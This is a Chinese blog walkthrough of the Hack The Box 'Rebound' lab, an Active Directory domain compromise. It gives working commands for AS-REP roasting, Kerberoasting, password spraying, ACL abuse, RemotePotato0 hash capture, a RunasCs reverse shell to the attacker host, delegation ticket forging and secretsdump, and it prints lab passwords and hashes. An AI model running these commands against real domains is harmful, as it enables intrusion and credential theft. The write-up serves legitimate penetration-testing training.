Hack The Box-Rebound-Insane

最新推荐文章于 2024-06-14 09:26:55 发布
最新推荐文章于 2024-06-14 09:26:55 发布
阅读量1k 收藏 21
点赞数 25
分类专栏: HTB Insane靶机合集 文章标签: hack the box windows 票据 权限委托 密码喷洒 用户枚举
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52742680/article/details/136321350
版权

端口扫描

nmap -sC -sV 10.10.11.231

在这里插入图片描述

观察扫描结果,目标Windows主机是一个域环境

ENUM

SMB匿名访问

使用crackmapexec能够检测到目标域名可以使用匿名用户进行登录

crackmapexec smb rebound.htb -u anonymous -p '' --shares

在这里插入图片描述

访问后发现共享文件夹中没有数据

RID枚举域内用户

使用crackmapexec对用户名进行枚举

crackmapexec smb rebound.htb -u anonymous -p '' --rid-brute 20000

在这里插入图片描述

枚举出了如下用户

rebound\Administrator
rebound\Guest
rebound\krbtgt
rebound\DC01$
rebound\ppaul
rebound\llune
rebound\fflock
rebound\jjones
rebound\mmalone
rebound\nnoon
rebound\ldap_monitor
rebound\oorend
rebound\winrm_svc
rebound\batch_runner
rebound\tbrady
rebound\delegator$

对这些用户进行AS-REP Roasting Attack

AS-REP Roasting Attack

AS-REP Roasting Attack是对AS-REP Roastable用户进行离线爆破的行为

在Kerberos身份验证中,预身份验证是第一步,其主要作用是防止密码脱机爆破。默认情况下,预身份验证是开启的,KDC(密钥分发中心)会记录密码错误次数,以防止在线爆破。然而,当某个用户账号设置了“不需要Kerberos预身份验证”后,攻击者就可以利用这一漏洞进行AS-REP Roasting攻击

攻击者首先获取至少一个域内用户权限或收集到域内用户,然后利用这一权限向KDC请求票据。由于预身份验证被关闭,KDC不会进行任何验证就将TGT(票据授权票据)和该用户Hash加密的Session Key返回给攻击者。接着,攻击者可以对获取到的用户Hash加密的Session Key进行离线破解,如果破解成功,就能得到该指定用户的密码明文

impacket-GetNPUsers模块能够直接探测是否有hash泄露

impacket-GetNPUsers rebound.htb/ -usersfile user.txt -outputfile outputusers.txt -dc-ip 10.10.11.231 -no-pass

在这里插入图片描述

爆破出jjones的hash值,放入john解密

在这里插入图片描述

解密失败,需要换一个方法

Kerberoasting

Kerberoasting 是一种针对 Kerberos 协议的攻击技术,它利用 Kerberos 认证过程中的某些弱点来获取域内用户的明文密码。Kerberos 是一种网络认证协议,用于在分布式计算环境中提供安全的身份验证和密钥交换。在 Kerberos 认证流程中,用户向 Kerberos 服务(Key Distribution Center,KDC)请求一个票据授权票据(Ticket-Granting Ticket,TGT),然后使用 TGT 请求服务票据(Service Ticket,ST)

Kerberoasting 攻击的关键在于,服务票据(ST)是使用服务主体的主密钥(Master Key)进行加密的,而域内的任何经过身份验证的用户都可以从 KDC 请求 ST。攻击者可以利用这一点,获取到用户请求的服务票据,并进行暴力破解,从而获取到服务主体的主密钥。一旦攻击者获得了服务主体的主密钥,他们就可以使用该密钥来解密所有使用该服务主体的 Kerberos 票据,进而获取到用户的明文密码

python GetUserSPNs.py -no-preauth "jjones" -usersfile "user.txt" -dc-host 10.10.11.231 rebound.htb/ -request

$krb5tgs$23$*ldap_monitor$rebound.htb$ldap_monitor*$C61B3780196088C1D881ED1F062A55A5$B60745B9F1037249C3B3451980FFFE544DF000B7F0F35365A0A80CCD396CAA8F6582E13BBCA7AF25A74A77AF98F17223728042B49AECCC8D2FDC3E1829F1936266CF66B655F4FD5F5582D2FADD9C5E97AD1006406C93C4F47D2F4F2B315BB765C0A933EE1221691D4CC75416BECEC34B31FD2A341AB50474716EF764AD2030E2140C53E9087C65A3942A5F0B9C8E4382F0CF99266E0DBA724257DDB88B280CD577D5C8A61E57A2F066B7CD076C37B651C80BCA4FAF2030808A9C9059901B09C856D717EB15F7BF1F93CCB8340DE47ADE630D95943725E2588A6AFA7F6BCF66467C525C608B9BC322C8CA0AE980824753943CEDEE749A5DF1E8A33D79058F872ACD18D8B232B6DF6C958AF758C01863FD3F182CF48F547060B7FBBBFFE50718A4E26CF3667A20F9D75B2A55FFB760F42EC685ACB2FE56FC75848AAE41AB57992EFD41DDB1CC8F9CEF54C6F27C7F2130C1B4EDB824C9577961ED748F093B175EB13D018262E7DA3090DB9D2CE66B08DC0942C48A0545A46D20392B84F48912C04C15CDE94B44E29E308BCABCD2A7A7F10F54EB7EB7FBBF93B788398BC1DCA9ED40233DB5C307244D248CAA1F3A2C00AD260B99A844BB368B74221AE4FB13E5632B1581D2F70F4645BA8E517B851C183BE1035C8D29120FE1711D90F3EA2E30D3B56BC49921938029BA1A5E8E65314EF8F17CEAD0798B8B7BF7A8D1023563978DDD06BC5C22576293D42C92A08B3868BF2C5971F04CED41C8B7F7C31E0AEB467D082780F551052270101E68D3DAE9CD49CA58CCFF4C9AF250718D4D0B349BE551DA81A06872C176C5D26E5BA41045D63FD691F234B7706299813EE8AAB8608812F66F627E896C853BE320D2101FAFBCF34A66C4437BF362DC4DBFC4E298D922BA7E35FA6A60369C595AFA7A843CD57BC0D5F8446414E256B4FE8E073DDA65E8BD8DD48C209C13FCE4D7FB4731D669D78099E163104698D1CB52600EC7258170E1ED2683D63F654E49239834742968AFC1B5D9621542FB421C1B0279E56B565C66FAFD02E1A9953D0AC04B2A8ED4B597C36392A652314C311E8F5C6C9442D17B8E2F0958EC59A73F63B1DB9628A303D9045DEB99DC0D0648D2F99F57B9964BCB2C0B7DDCB27BA6DEC7395D4BF2245EF7D801952E94EEF8AC6E62648E4343372D200E178EE1258F35FC69233250F5744C3329EFFFC481BBE6F10400A4145E0F5260615874F9B06AC212B3CD76C94BB4A035FE28F2D54C4D882DA918547D7706F3E87BDB0F5E837A757E5FB9A2DBE9B3CC9BB5A3B9E639173BD1C7DF697A6472D2A7FD66F57ACBEEE38565214CAEF922F4D2CF1D8B

在这里插入图片描述

破解出ldap_monitor用户的密码为1GR8t@$$4u

密码喷洒

使用crackmapexec工具对此密码进行喷洒,查看还有什么用户也使用了此密码

crackmapexec smb rebound.htb -u user.txt -p '1GR8t@$$4u' --continue-on-success

在这里插入图片描述

发现ServiceMgmt组也使用了此密码,因此接下来列出SerivceMgmt组的权限和具有的ACLS

Powerview

使用powerview来分析ACL

faketime -f +7h python3 powerview.py rebound.htb/ldap_monitor:'1GR8t@$$4u'@rebound.htb --dc-ip 10.10.11.231 -k

在这里插入图片描述

Get-ObjectAcl表示获取某一个特定服务的ACL
Server表示目标服务器的域名
ResolveGUIDs表示常用于表示要解析ACL中的GUID(全局唯一标识符)。在ACL中,用户和组的标识符通常以GUID的形式表示,这个标志允许将这些GUID解析为其对应的用户或组的名称

查看oorend用户的策略

在这里插入图片描述

该账户拥有 ServiceMgmt组的Self访问权限,该权限可以执行验证写入,因此将接下来的步骤是:将用户oorend添加到ServiceMgmt组中->给组添加GenericAll权限->修改用户winrm_svc的密码>通过winrm进入

BloodyAD

Linux上使用bloodyAD首先需要安装依赖环境

apt-get install libkrb5-dev
pip install bloodyAD

将oorend用户添加到ServiceMgmt组中

faketime -f +7h bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb add groupMember 'CN=SERVICEMGMT,CN=USERS,DC=REBOUND,DC=HTB' "CN=oorend,CN=Users,DC=rebound,DC=htb"

在这里插入图片描述

以此执行以下命令

faketime -f +7h bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb add groupMember 'CN=SERVICEMGMT,CN=USERS,DC=REBOUND,DC=HTB' "CN=oorend,CN=Users,DC=rebound,DC=htb"
#获取TGT
faketime -f +7h python3 getTGT.py rebound.htb/oorend:'1GR8t@$$4u'
export KRB5CCNAME=oorend.ccache
#给予修改密码的权限
faketime -f +7h python3 dacledit.py rebound.htb/oorend:'1GR8t@$$4u' -dc-ip 10.10.11.231 -k -use-ldaps -principal "oorend" -action write -rights ResetPassword -target-dn "OU=SERVICE USERS,DC=REBOUND,DC=HTB" -debug -inheritance
#修改winrm_svc的密码为1GR8t@$$4u
net rpc password winrm_svc -U 'rebound.htb/oorend%1GR8t@$$4u' -S rebound.htb

在这里插入图片描述

使用evil_winrm登录到winrm_svc用户

在这里插入图片描述

接下去使用RemotePotato0进行进一步拿取数据

RemotePotato0

将RemotePotato0上传到靶机后,在kali中运行

socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.10.11.231:9999 && sudo python3 ~/Desktop/tools/impacket-master/examples -t ldap://10.10.11.231 --no-wcf-server --escalate-user winrm_svc

在靶机中运行

.\RemotePotato0.exe -m 2 -r 10.10.14.49 -x 10.10.14.49 -p 9999 -s 1

在这里插入图片描述

在这里插入图片描述

图二中能看到已经获取到了tbrady用户的NTLMv2的hash值,放入john中解密

在这里插入图片描述

破解出tbrady/543BOMBOMBUNmanda,在winrm_svc用户使用RunasCs和此凭证将tbrady用户shell转发到本地(PS:因为靶机会定期重置密码,所以会出现winrm_svc用户掉线的情况,需要重新执行上述重置密码的步骤)

./RunasCs.exe tbrady 543BOMBOMBUNmanda cmd.exe -r 10.10.14.49:9000

在这里插入图片描述

从前面可知,tbrady用户能够获取用户delegator$的GMSA密码,因此上传GMSAPasswordReader.exe到靶机

GMSA

GMSA.exe --accountname delegator$

在这里插入图片描述

也可以使用crackmapexec和bloodyAD获取NTLM

faketime -f +7h crackmapexec ldap dc01.rebound.htb -u tbrady -p 543BOMBOMBUNmanda -k --gmsa
bloodyAD -d rebound.htb -u tbrady -p '543BOMBOMBUNmanda' --host dc01.rebound.htb get object 'delegator$' --attr msDS-ManagedPassword

在这里插入图片描述

权限委托

一旦我们有了哈希值,我们就可以从用户委托人那里获得一张票

faketime -f +7h impacket-getTGT 'rebound.htb/delegator$' -hashes aad3b435b51404eeaad3b435b51404ee:8689904d05752e977a546e201d09e724 -dc-ip 10.10.11.231

在这里插入图片描述

导出票据

export KRB5CCNAME=delegator\$.ccache

委托给ldap_monitor用户

faketime -f +7h impacket-rbcd 'rebound.htb/delegator$' -k -no-pass -delegate-from ldap_monitor -delegate-to 'delegator$' -action write -use-ldaps -debug -dc-ip 10.10.11.231

在这里插入图片描述

一旦权限被委托,我们就会从ldap_monitor用户那里获得一张票证

faketime -f +7h impacket-getTGT 'rebound.htb/ldap_monitor:1GR8t@$$4u' -dc-ip 10.10.11.231

在这里插入图片描述

导出票据

export KRB5CCNAME=ldap_monitor.ccache

从dc01得到一张票

faketime -f +7h impacket-getST -spn "browser/dc01.rebound.htb" -impersonate "dc01$" "rebound.htb/ldap_monitor" -k -no-pass -dc-ip 10.10.11.231

导出票据

export KRB5CCNAME=dc01\$.ccache

生成一张额外的票

faketime -f +7h impacket-getST -spn "http/dc01.rebound.htb" -impersonate "dc01$" -additional-ticket "dc01$.ccache" "rebound.htb/delegator$" -hashes aad3b435b51404eeaad3b435b51404ee:8689904d05752e977a546e201d09e724 -k -no-pass -dc-ip 10.10.11.231

在这里插入图片描述

HashDump

使用dc01的票证,impacket中使用Secretsdump提取管理员用户的哈希值

faketime -f +7h impacket-secretsdump -no -k dc01.rebound.htb -just-dc-user administrator -dc-ip 10.10.11.231

在这里插入图片描述

得到administrator的Hash值:aad3b435b51404eeaad3b435b51404ee:176be138594933bb67db3b2572fc91b8:::

使用evil-winrm登录到administrator用户

在这里插入图片描述

0415i
关注
  • 25
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Boxel-rebound-hope
03-30
Boxel-rebound-hope
practice-rebound-game
03-18
这是一款名为Rebound的游戏,它是一种古老的游戏,已经存在了很长时间,并且似乎是常见的入门级Javascript游戏。 我发布的最后两个存储库都与此相关,并且可以作为它的入门。 还应该说,我正在将这些练习项目推到...
Hack the box -- Responder靶机
m0_64815693的博客
12-15 2291
Hack the back 靶场 Responder
HackTheBox-Return
网安星空
01-28 419
本次记录的是HTB Tracks 系列的 Intro to Printer Exploitation,即打印机相关漏洞的场景合集。随着攻防对抗的升级,打印机也成了的攻击目标之一。研究表明,打印机存在较多攻击面,使它们很容易遭受攻击。本次靶机为Return,涉及到域控安全、打印机安全等知识点。
Facebook-Rebound弹簧效果
wuqingsen1的博客
11-29 1528
在 Android 使用动画,除了属性动画比较好用,还有 Facebook-Rebound 的动画效果,今天就来通过几个小的动画效果来初步了解以下 Facebook-Rebound 。下面是效果图: 效果十分的酷炫,下面就来看一下如何实现的;上面一共有三个动画效果,下面就来分别看一下 Facebook-Rebound 官网:http://facebook.github.io/rebound...
【渗透测试】Rebound - HackTheBox,疯狂难度的纯粹域渗透
m0_74272345的博客
11-30 998
这个靶机纯粹的域渗透,真的难绷,这个星级和267的BF不是假的,马上期末得开始复习了(不然挂科了),这个靶机后面再打吧。虽然没打完,但还是学到挺多Windows域渗透的知识和方法。1.RID遍历枚举域内用户,拿到这台机器的一个用户名列表users.list2.发现jjones用户,但是hash没法破解出来3.得到四个用户密码,但是只有1GR8t@$$4u4.密码喷洒撞出两个用户和oorend5.bloodhound分析出一个可能的攻击向量,然后powerview发现oorend。
OpenHarmony UI动画-rebound
maniuT的博客
04-18 1184
rebound是一个模拟弹簧动力学,用于驱动物理动画的库。
Facebook-Rebound探索发现
JackChan
12-24 596
简书lumenghz,原文链接:http://www.jianshu.com/p/190a07aaa128Facebook是什么就不赘述,我知道rebound这个库也是在看一个叫做Paper的软件的时候延伸到的,首先我介绍一下Paper。Paper是一个新闻客户端,Facebook设计和开发的他们迄今为止最优秀的移动应用,让人惊艳的优秀交互是大家关注的焦点,全手势、超流畅交互是吸引人的亮点。良心企业
The digital currency market began a short-term rebound
weixin_42154608的博客
09-25 191
In the rally from September 18 to the present, the total market value of the entire digital currency market increased by $34 billion. After a large-scale short-term rebound, the entire digital money m...
Rebound-Android的弹簧动画库
热门推荐
Android小酌
02-18 2万+
简介官方网站githubRebound是facebook出品的一个弹簧动画库,与之对应的IOS版本有一个pop动画库,也是非常的强大给力。Facebook真是互联网企业中的楷模,开源了很多的实用开源库,大赞一个!!!
android 弹簧震动动画,Android-Rebound(弹簧系统-让动画不再僵硬)的简单使用与源码分析...
weixin_34540485的博客
05-25 407
综述:Rebound 通过胡克定律,实现的一个类似“弹簧”动画效果的第三方工具包。单独使用Spring spring = SpringSystem.create().createSpring();spring.addListener(new SimpleSpringListener() {@Overridepublic void onSpringUpdate(Spring spring) {su...
practice-rebound
03-13
最终项目名称 介绍 这是我最后一个项目的介绍yadda yadda 另一个标题 在这里写一些东西。 这是一张桌子,如果您想要一个: 场地 描述 领域1 说明1 领域2 说明2 领域3 说明3 继续在这里写更多的...更酷的东西
react-native-rebound-scrollview ★12 - React Native Android ReboundScrollView 实现。
06-08
rootProject.projectDir, '../node_modules/react-native-rebound-scrollview/android/app') 在 android/app/build.gradle ... dependencies { ... compile project(':ReboundScrollView') } 注册模块(在 ...
rebound-master.zip
07-30
rebound-master.zip,太多无法一一验证是否可用,程序如果跑不起来需要自调,部分代码功能进行参考学习。
Mybatis --- 动态SQL 和数据库连接池
最新发布
wuweixiaoyue的博客
06-14 547
什么是动态SQL:根据需求(),去动态地拼接SQL重要性编写方式的选择:根据个人喜好和企业中的其他人用什么来选择推荐:简单SQL用注解,动态SQL用xml动态SQL,语句会比较复杂,此时使用xml更易读,而且因为本身支持标签,书写还会有提示简单SQL,使用注解会更简单,xml还需要另外写文件(当然,也有例如MybatisGenerator之类的插件可以帮我们去生成)
【C#】IndexOf的使用
wangnaisheng的专栏
06-11 271
【C#】IndexOf的使用
【C++11】常见的c++11新特性(一)
稻草人敲代码的博客
06-10 1044
c++11,即2011年发布的新c++标准。相比于c++98和03,c++11带来了很多变化,其中包含了约140多个新特性,以及对c++03标准中大约600多个缺陷的修正。这使得c++11更像是一个从c++98/03孕育出来的一个新版本。对比于之前的版本,c++11能更好的用于系统开发和库开发、语法更加的泛华和简单化、更加稳定和安全,不仅功能更加强大,而且能提升程序员的开发效率。这也是我们学习c++11的重要原因。下面介绍常见的一些c++11特性。左值引用只能引用左值,不能引用右值,比如。
使用net.sf.mpxj读取project的.mpp文件
Kally_tao的专栏
06-11 228
【代码】使用net.sf.mpxj读取project的.mpp文件。
找出如下文字的语法问题:“Ads also works well due to the cinema‘s immersive environment which Target audience shows higher affinity on. And cinema is expected a quick rebound in 2023 which already proved in CNY, the box office exceed pre-Covid’s peak season”
03-10
这段文字存在两个语法问题。第一个问题是“Target audience shows higher affinity on”,应该改为“Target audience shows a higher affinity for”。第二个问题是“expected a quick rebound”,应该改为“expected to experience a quick rebound”。正确的句子应该是:“Ads also work well due to the cinema's immersive environment, which the target audience shows a higher affinity for. And cinema is expected to experience a quick rebound in 2023, which was already proved during CNY when the box office exceeded pre-Covid's peak season.”

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值